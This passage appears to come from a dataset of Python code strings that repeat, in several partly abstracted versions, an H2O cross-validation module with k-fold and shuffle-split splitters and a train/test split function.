\"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.0:\n raise ValueError(\n 'train_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size\n ).dtype.kind == 'f' and train_size + test_size > 1.0:\n raise ValueError(\n 'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, 